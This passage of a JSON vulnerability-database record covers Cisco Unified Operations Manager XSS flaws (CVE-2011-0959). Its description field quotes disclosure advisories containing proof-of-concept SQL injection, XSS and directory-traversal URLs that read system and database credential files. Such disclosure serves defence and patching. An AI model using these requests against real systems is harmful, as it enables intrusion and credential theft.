        "vendor": "cisco",
        "version": "2.3"
      },
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "cisco",
        "version": "8.0"
      },
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "cisco",
        "version": "2.0.1"
      },
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "cisco",
        "version": "2.0.2"
      },
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 2.5,
        "vendor": "cisco",
        "version": "2.0.3"
      },
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "cisco",
        "version": "2.0"
      },
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "1.1"
      },
      {
        "model": "unified operations manager",
        "scope": "eq",
        "trust": 1.5,
        "vendor": "cisco",
        "version": "8.5"
      },
      {
        "model": "unified operations manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "8.5"
      },
      {
        "model": "unified operations manager sp1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "cisco",
        "version": "2.1"
      },
      {
        "model": "unified operations manager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "8.6"
      },
      {
        "model": "unified operations manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.6"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "db": "BID",
        "id": "47901"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0959"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "8.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:unified_operations_manager:2.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-0959"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sense of Security Labs.",
    "sources": [
      {
        "db": "BID",
        "id": "47901"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2011-0959",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2011-0959",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-48904",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-0959",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201105-206",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-48904",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-48904"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0959"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716. Cisco Unified Operations Manager (CUOM) Contains a cross-site scripting vulnerability. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials.   Other attacks may also be possible. \nThis issue is being tracked by Cisco Bug ID CSCtn61716. Sense of Security - Security Advisory - SOS-11-006\n\nRelease Date.                  18-May-2011\nLast Update.                   -\nVendor Notification Date.      28-Feb-2011\nProduct.                       Cisco Unified Operations Manager\n                               Common Services Framework Help Servlet\n                               Common Services Device Center\n                               CiscoWorks Homepage\n                               Note: All of the above products are\n                               included by default in CuOM. \nPlatform.                      Microsoft Windows\nAffected versions.             CuOM 8.0 and 8.5 (verified),\n                               possibly others. \nSeverity Rating.               Medium - Low\nImpact.                        Database access, cookie and credential\n                               theft, impersonation, loss of\n                               confidentiality, local file disclosure,\n                               information disclosure. \nAttack Vector.                 Remote with authentication\nSolution Status.               Vendor patch (upgrade to CuOM 8.6 as\n                               advised by Cisco)\nCVE reference.                 CVE-2011-0959 (CSCtn61716)\n                               CVE-2011-0960 (CSCtn61716)\n                               CVE-2011-0961 (CSCto12704)\n                               CVE-2011-0962 (CSCto12712)\n                               CVE-2011-0966 (CSCto35577)\n\nDetails. Operations Manager monitors and evaluates the current\nstatus of both the IP communications infrastructure and the underlying\ntransport infrastructure in your network. These vulnerabilities\ninclude multiple blind SQL injections, multiple XSS. and a directory\ntraversal vulnerability. \n\n1. Blind SQL injection vulnerabilities that affect CuOM\nCVE-2011-0960 (CSCtn61716):\nThe Variable CCMs of PRTestCreation can trigger a blind SQL injection\nvulnerability by supplying a single quote, followed by a time delay\ncall:\n/iptm/PRTestCreation.do?RequestSource=dashboard\u0026MACs=\u0026CCMs=\u0027waitfor%20\ndelay\u00270:0:20\u0027--\u0026Extns=\u0026IPs=\n\nAdditionally, variable ccm of TelePresenceReportAction can trigger a\nblind SQL injection vulnerability by supplying a single quote:\n/iptm/TelePresenceReportAction.do?ccm=\u0027waitfor%20delay\u00270:0:20\u0027--\n\n2. Reflected XSS vulnerabilities that affect CuOM\nCVE-2011-0959 (CSCtn61716):\n/iptm/advancedfind.do?extn=73fcb\u003c/script\u003e\u003cscript\u003ealert(1)\u003c/script\u003e23fb\ne43447\n/iptm/ddv.do?deviceInstanceName=f3806\"%3balert(1)//9b92b050cf5\u0026deviceC\napability=deviceCap\n/iptm/ddv.do?deviceInstanceName=25099\u003cscript\u003ealert(1)\u003c/script\u003ef813ea8c\n06d\u0026deviceCapability=deviceCap\n/iptm/eventmon?cmd=filterHelperca99b\u003cscript\u003ealert(1)\u003c/script\u003e542256870\nd5\u0026viewname=device.filter\u0026operation=getFilter\u0026dojo.preventCache=129851\n8961028\n/iptm/eventmon?cmd=getDeviceData\u0026group=/3309d\u003cscript\u003ealert(1)\u003c/script\u003e\n09520eb762c\u0026dojo.preventCache=1298518963370\n/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84\"%3b\nalert(1)//608ddbf972\n/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8\"%3ba\nlert(1)//79877affe89\n/iptm/logicalTopo.do?clusterName=\u0026ccmName=ed1b1\"%3balert(1)//cda6137ae\n4c\n/iptm/logicalTopo.do?clusterName=db4c1\"%3balert(1)//4031caf63d7\n\nReflected XSS vulnerability that affect Common Services Device Center\nCVE-2011-0962 (CSCto12712):\n/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introduc\ntionhomepage61a8b\"%3balert(1)//4e9adfb2987\n\nReflected XSS vulnerability that affects Common Services Framework\nHelp Servlet CVE-2011-0961 (CSCto12704):\n/cwhp/device.center.do?device=\u002672a9f\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e5f5251a\naad=1\n\n3. Directory traversal vulnerability that affects CiscoWorks Homepage\nCVE-2011-0966 (CSCto35577):\nhttp://target:1741/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\boot.ini\ncmfDBA user database info:\nhttp://target:1741/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\Program \nFiles\\CSCOpx\\MDC\\Tomcat\\webapps\\triveni\\WEB-INF\\classes\\schedule.prope\nrties\nDB connection info for all databases:\nhttp://target:1741/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\Program \nFiles\\CSCOpx\\lib\\classpath\\com\\cisco\\nm\\cmf\\dbservice2\\DBServer.proper\nties\nNote: When reading large files such as this file, ensure the row\nlimit is adjusted to 500 for example. \nDB password change log:\nhttp://target:1741/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\Program \nFiles\\CSCOpx\\log\\dbpwdChange.log\nSolution. \nUpgrade to CuOM 8.6. \nRefer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and\nCSCto35577 for information on patches and availability of fixes. \n\nDiscovered by. \nSense of Security Labs. \n\nAbout us. \nSense of Security is a leading provider of information\nsecurity and risk management solutions. Our team has expert\nskills in assessment and assurance, strategy and architecture,\nand deployment through to ongoing management. We are\nAustralia\u0027s premier application penetration testing firm and\ntrusted IT security advisor to many of the countries largest\norganisations. \n\nSense of Security Pty Ltd \nLevel 8, 66 King St\nSydney NSW 2000\nAUSTRALIA\n\nT: +61 (0)2 9290 4444\nF: +61 (0)2 9290 4455\nW: http://www.senseofsecurity.com.au\nE: info@senseofsecurity.com.au\nTwitter: @ITsecurityAU\n\nThe latest version of this advisory can be found at:\nhttp://www.senseofsecurity.com.au/advisories/SOS-11-006.pdf\n\nOther Sense of Security advisories can be found at:\nhttp://www.senseofsecurity.com.au/research/it-security-advisories.php\n. ----------------------------------------------------------------------\n\n\nhttp://twitter.com/secunia\n\nhttp://www.facebook.com/Secunia\n\n\n----------------------------------------------------------------------\n\nTITLE:\nCisco Unified Operations Manager Cross-Site Scripting and SQL\nInjection Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA44597\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/44597/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44597\n\nRELEASE DATE:\n2011-05-20\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/44597/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/44597/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44597\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in Cisco Unified Operations\nManager, which can be exploited by malicious people to conduct\ncross-site scripting and SQL injection attacks. \n\n1) Input passed via the \"CCMs\" parameter to iptm/PRTestCreation.do\nand the \"ccm\" parameter to iptm/TelePresenceReportAction.do is not\nproperly sanitised before being used in SQL queries. This can be\nexploited to manipulate SQL queries by injecting arbitrary SQL code. \n\n2) Input passed via various parameters to multiple scripts is not\nproperly sanitised before being returned to the user. \n\nExamples:\nhttp://[host]/iptm/advancedfind.do?extn=[code]\nhttp://[host]/iptm/ddv.do?deviceCapability=deviceCap\u0026deviceInstanceName=[code]\nhttp://[host]/iptm/eventmon?viewname=device.filter\u0026operation=getFilter\u0026cmd=[code]\nhttp://[host]/iptm/eventmon?cmd=getDeviceData\u0026group=[code]\nhttp://[host]/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=[code]\nhttp://[host]/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=[code]\nhttp://[host]/iptm/logicalTopo.do?ccmName=[code]\nhttp://[host]/iptm/logicalTopo.do?clusterName=[code]\n\n3) Input passed via the \"tag\" parameter to\nCSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine in Common Services\nDevice Center is not properly sanitised before being returned to the\nuser. \n\nThe vulnerabilities are reported in versions 8.0 and 8.5. \n\nSOLUTION:\nUpdated to version 8.6. \n\nPROVIDED AND/OR DISCOVERED BY:\nSense of Security Labs\n\nORIGINAL ADVISORY:\nCisco:\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=23085\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=23086\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=23087\n\nSense of Security Labs:\nhttp://www.senseofsecurity.com.au/advisories/SOS-11-006\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-0959"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "db": "BID",
        "id": "47901"
      },
      {
        "db": "VULHUB",
        "id": "VHN-48904"
      },
      {
        "db": "PACKETSTORM",
        "id": "101518"
      },
      {
        "db": "PACKETSTORM",
        "id": "101570"
      }
    ],
    "trust": 2.7
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-48904",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-48904"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-0959",
        "trust": 3.5
      },
      {
        "db": "EXPLOIT-DB",
        "id": "17304",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003127",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201105-206",
        "trust": 0.7
      },
      {
        "db": "SECUNIA",
        "id": "44597",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "67521",
        "trust": 0.6
      },
      {
        "db": "FULLDISC",
        "id": "20110518 CISCO UNIFIED OPERATIONS MANAGER MULTIPLE VULNERABILITIES - SOS-11-006",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "47901",
        "trust": 0.4
      },
      {
        "db": "PACKETSTORM",
        "id": "101518",
        "trust": 0.2
      },
      {
        "db": "EXPLOIT-DB",
        "id": "35762",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "35764",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "35763",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "35766",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "35765",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-48904",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "101570",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "db": "VULHUB",
        "id": "VHN-48904"
      },
      {
        "db": "BID",
        "id": "47901"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      },
      {
        "db": "PACKETSTORM",
        "id": "101518"
      },
      {
        "db": "PACKETSTORM",
        "id": "101570"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0959"
      }
    ]
  },
  "id": "VAR-201105-0046",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "db": "VULHUB",
        "id": "VHN-48904"
      }
    ],
    "trust": 1.3875
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      }
    ]
  },
  "last_update_date": "2024-02-14T22:47:00.450000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "23085",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=23085"
      },
      {
        "title": "Patch for multiple cross-site scripting vulnerabilities in Cisco Unified Operations Manager",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/3890"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-48904"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0959"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=23085"
      },
      {
        "trust": 2.0,
        "url": "http://archives.neohapsis.com/archives/fulldisclosure/2011-05/0371.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.senseofsecurity.com.au/advisories/sos-11-006.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/17304"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/67521"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0959"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-0959"
      },
      {
        "trust": 0.6,
        "url": "http://www.senseofsecurity.com.au/advisories/sos-11-006.pdfhttp"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/67521"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/44597"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/en/us/products/ps6535/index.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.senseofsecurity.com.au/advisories/sos-11-006.pdf "
      },
      {
        "trust": 0.1,
        "url": "http://target:1741/cwhp/auditlog.do?file=..\\..\\..\\..\\..\\..\\..\\program"
      },
      {
        "trust": 0.1,
        "url": "http://www.senseofsecurity.com.au"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0961"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0960"
      },
      {
        "trust": 0.1,
        "url": "http://www.senseofsecurity.com.au/research/it-security-advisories.php"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0962"
      },
      {
        "trust": 0.1,
        "url": "http://target:1741/cwhp/auditlog.do?file=..\\..\\..\\..\\..\\..\\..\\boot.ini"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0966"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0959"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44597"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/products/corporate/evm/"
      },
      {
        "trust": 0.1,
        "url": "http://[host]/iptm/faultmon/ui/dojo/main/eventmon_wrapper.jsp?clustername=[code]"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/44597/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://[host]/iptm/logicaltopo.do?clustername=[code]"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://[host]/iptm/ddv.do?devicecapability=devicecap\u0026deviceinstancename=[code]"
      },
      {
        "trust": 0.1,
        "url": "http://www.senseofsecurity.com.au/advisories/sos-11-006"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/44597/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://twitter.com/secunia"
      },
      {
        "trust": 0.1,
        "url": "http://www.facebook.com/secunia"
      },
      {
        "trust": 0.1,
        "url": "http://[host]/iptm/advancedfind.do?extn=[code]"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://[host]/iptm/eventmon?viewname=device.filter\u0026operation=getfilter\u0026cmd=[code]"
      },
      {
        "trust": 0.1,
        "url": "http://[host]/iptm/logicaltopo.do?ccmname=[code]"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=23086"
      },
      {
        "trust": 0.1,
        "url": "http://[host]/iptm/eventmon?cmd=getdevicedata\u0026group=[code]"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=23087"
      },
      {
        "trust": 0.1,
        "url": "http://[host]/iptm/faultmon/ui/dojo/main/eventmon_wrapper.jsp?devicename=[code]"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "db": "VULHUB",
        "id": "VHN-48904"
      },
      {
        "db": "BID",
        "id": "47901"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      },
      {
        "db": "PACKETSTORM",
        "id": "101518"
      },
      {
        "db": "PACKETSTORM",
        "id": "101570"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0959"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "db": "VULHUB",
        "id": "VHN-48904"
      },
      {
        "db": "BID",
        "id": "47901"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003127"
      },
      {
        "db": "PACKETSTORM",
        "id": "101518"
      },
      {
        "db": "PACKETSTORM",
        "id": "101570"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201105-206"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-0959"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-05-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2011-1912"
      },
      {
        "date": "2011-05-20T00:00:00",
        "db": "VULHUB",
